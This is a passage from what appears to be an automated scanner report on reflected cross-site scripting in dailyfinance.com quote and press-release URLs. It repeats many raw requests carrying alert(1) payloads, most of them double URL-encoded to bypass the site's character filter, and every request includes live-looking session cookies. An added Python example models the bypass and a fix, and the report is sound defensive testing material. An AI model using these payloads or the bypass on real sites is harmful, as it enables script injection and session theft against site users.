Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Market Movers:</titl ...[SNIP]... <!-- var relegenceTopics='MOSTACTIVES1EAD7';01FD5909B1'; var RTN_SNIPPET_SIZE = '300'; var RTN_HOVER_TIMEOUT = '16000'; // --> ...[SNIP]...
1.351. http://www.dailyfinance.com/press-releases/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /press-releases/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab488"-alert(1)-"b3fecd9a6b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /press-releases/?ab488"-alert(1)-"b3fecd9a6b3=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea316'%3b11184aed841 was submitted in the REST URL parameter 3. This input was echoed as ea316';11184aed841 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/bank-of-america-corporation/bacea316'%3b11184aed841/nys HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15a37%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e82092af8370 was submitted in the REST URL parameter 3. This input was echoed as 15a37"><script>alert(1)</script>82092af8370 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
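The two findings above come down to the same question of where decoding and encoding happen: the single-quoted JavaScript string that a bare ' terminates, and the character filter that double URL-encoding defeats because validation runs on the once-decoded value and a second decode follows it. The Python below is an added illustration, not part of the scanner output or of the target's code. The filter's blocked character set, the page fragments and every function name are assumptions; the payloads are the ones recorded in the report. It reproduces the bypass and shows a handler that decodes once and encodes separately for the attribute and script contexts.

```python
"""Added example, not part of the scanner output or of dailyfinance.com's
code.  It models the two behaviours reported for REST URL parameter 3:

  1. a character filter that runs on the once-decoded path segment, followed
     by a second URL-decode before the value is reflected, so %253c passes
     the filter and still arrives in the page as '<';
  2. reflection into a single-quoted JavaScript string, where a bare ' ends
     the literal.

The filter's blocked set, the page fragment and the function names are
assumptions made for illustration.
"""
from typing import Optional
from urllib.parse import unquote
import html
import json

# Assumed filter: rejects the characters the report says the application
# tries to block.  ' is deliberately absent, matching the observation that
# ea316';... was echoed unchanged into the JS string context.
BLOCKED = frozenset('<>"')


def server_decode(raw_segment: str) -> str:
    """The web server percent-decodes the path once before the app sees it."""
    return unquote(raw_segment)


def vulnerable_render(raw_segment: str) -> Optional[str]:
    """Validate, then decode a second time, then reflect without encoding.

    Returns None when the filter rejects the input, otherwise the page
    fragment the requester would receive.  This is the bug class in the
    report: validation happens before the final canonicalisation step."""
    value = server_decode(raw_segment)
    if BLOCKED & set(value):
        return None                     # filter sees %3c, not <
    value = unquote(value)              # second decode turns %3c into <
    return (f'<a href="/quotes/{value}/nys">quote</a>\n'
            f"<script>var symbol = '{value}';</script>")


def js_string_literal(value: str) -> str:
    """Encode VALUE as a JavaScript string literal that cannot break out of
    its quotes or close the surrounding <script> element."""
    literal = json.dumps(value)         # escapes ", \, control chars, U+2028/9
    return literal.replace('<', '\\u003c').replace('>', '\\u003e')


def hardened_render(raw_segment: str) -> str:
    """Decode once, never re-decode, and encode for each output context."""
    value = server_decode(raw_segment)
    attr = html.escape(value, quote=True)   # HTML attribute context
    js = js_string_literal(value)           # JavaScript string context
    return (f'<a href="/quotes/{attr}/nys">quote</a>\n'
            f"<script>var symbol = {js};</script>")


if __name__ == "__main__":
    # Payloads taken from the report; single is the same attack encoded once.
    single = "15a37%22%3e%3cscript%3ealert%281%29%3c%2fscript%3e82092af8370"
    double = "15a37%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e82092af8370"
    quote = "ea316'%3b11184aed841"
    print("single-encoded, vulnerable:", vulnerable_render(single))
    print("double-encoded, vulnerable:", vulnerable_render(double))
    print("quote payload,  vulnerable:", vulnerable_render(quote))
    print("double-encoded, hardened:  ", hardened_render(double))
    print("quote payload,  hardened:  ", hardened_render(quote))
```

The hardened handler emits a double-quoted JSON literal in place of the original single-quoted string; that is a valid JavaScript string literal, and escaping < and > as \u003c and \u003e keeps a reflected </script> from closing the element. The character filter is left in place only to show that it no longer matters: the fix is to decode exactly once and to encode for the context the value lands in, not to tune the blocklist.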
Request
GET /quotes/bank-of-america-corporation/bac15a37%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e82092af8370/nys HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5e0d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efb1c5cc44fe was submitted in the REST URL parameter 3. This input was echoed as f5e0d"><script>alert(1)</script>fb1c5cc44fe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/citigroup-incorporated/cf5e0d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efb1c5cc44fe/nys HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb633'%3bce592cb8e82 was submitted in the REST URL parameter 3. This input was echoed as eb633';ce592cb8e82 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/citigroup-incorporated/ceb633'%3bce592cb8e82/nys HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c977d'%3b34995d9ca3b was submitted in the REST URL parameter 3. This input was echoed as c977d';34995d9ca3b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/complete-production-services-inc/cpxc977d'%3b34995d9ca3b/nys HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b39cf%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e964ca8a9ae6 was submitted in the REST URL parameter 3. This input was echoed as b39cf"><script>alert(1)</script>964ca8a9ae6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/complete-production-services-inc/cpxb39cf%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e964ca8a9ae6/nys HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41711%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e832a8319c25 was submitted in the REST URL parameter 3. This input was echoed as 41711"><script>alert(1)</script>832a8319c25 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/daqq-new-energy-corp-american-depositary-shares-each-representing-five-ordinary-shares/dq41711%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e832a8319c25/nys HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8aaf3'%3b9e8dbdc7c01 was submitted in the REST URL parameter 3. This input was echoed as 8aaf3';9e8dbdc7c01 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/daqq-new-energy-corp-american-depositary-shares-each-representing-five-ordinary-shares/dq8aaf3'%3b9e8dbdc7c01/nys HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bdbd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec53359abab7 was submitted in the REST URL parameter 3. This input was echoed as 3bdbd"><script>alert(1)</script>c53359abab7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/dax-performance-index/dax3bdbd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec53359abab7/dei HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e68c5'%3b751d00d2e1 was submitted in the REST URL parameter 3. This input was echoed as e68c5';751d00d2e1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/dax-performance-index/daxe68c5'%3b751d00d2e1/dei HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ca30'%3b0cf1d63329d was submitted in the REST URL parameter 3. This input was echoed as 4ca30';0cf1d63329d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/dow-jones-industrial-average/$indu4ca30'%3b0cf1d63329d/dji HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca685%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e02a9bda659a was submitted in the REST URL parameter 3. This input was echoed as ca685"><script>alert(1)</script>02a9bda659a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/dow-jones-industrial-average/$induca685%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e02a9bda659a/dji HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ab04%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e74877c9a21c was submitted in the REST URL parameter 3. This input was echoed as 9ab04"><script>alert(1)</script>74877c9a21c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/euro-b-vs-united-states-dollar-spot-eur-usd/eurusd9ab04%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e74877c9a21c/fx1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37b3b'%3b64d540556e0 was submitted in the REST URL parameter 3. This input was echoed as 37b3b';64d540556e0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/euro-b-vs-united-states-dollar-spot-eur-usd/eurusd37b3b'%3b64d540556e0/fx1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6428%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e22c1c1970b4 was submitted in the REST URL parameter 3. This input was echoed as f6428"><script>alert(1)</script>22c1c1970b4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/evergreen-energy-inc-new/eeef6428%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e22c1c1970b4/nys HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa079'%3bc4bef405864 was submitted in the REST URL parameter 3. This input was echoed as fa079';c4bef405864 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/evergreen-energy-inc-new/eeefa079'%3bc4bef405864/nys HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88bb9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4d1584cb86f was submitted in the REST URL parameter 3. This input was echoed as 88bb9"><script>alert(1)</script>4d1584cb86f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
